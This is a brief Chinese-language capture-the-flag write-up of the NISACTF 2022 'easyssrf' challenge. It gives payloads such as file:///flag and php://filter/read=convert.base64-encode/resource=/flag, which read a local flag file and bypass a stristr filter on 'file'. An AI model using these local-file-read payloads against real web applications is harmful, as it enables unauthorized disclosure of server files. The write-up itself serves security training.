[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
JS_SWKJ41 分钟前
MQTT协议如何穿透单向网闸?IoT/IIoT场景下的安全“破壁”之道
网络安全
黑战士安全1 小时前
基于Ollama的自动化渗透测试框架:设计方案
web安全·网络安全·渗透测试
山川绿水2 小时前
Buuctf——[GYCTF2020]Ezsqli
web安全·网络安全·ctf
波兰的蓝2 小时前
《内网渗透实战:红日 1 号全流程复现(Web 入侵 / 提权 / 横向移动 / 黄金票据)》
web安全·网络安全
vortex52 小时前
逻辑漏洞挖掘思路小结
网络安全
xingxin3213 小时前
日志文件分析溯源(连接WebShell的IP地址)实验报告
安全·web安全·网络安全·php·文件上传
heze0920 小时前
sqli-labs-Less-50
数据库·mysql·网络安全
三七吃山漆21 小时前
[红明谷CTF 2021]write_shell
php·ctf·[红明谷ctf 2021]
瘾大侠1 天前
HTB - Kobold
网络·安全·web安全·网络安全
中科固源1 天前
强制性国标在路上:预解读《民用无人驾驶航空器数据链路网络安全要求》(二)
安全·网络安全·低空经济·商业航天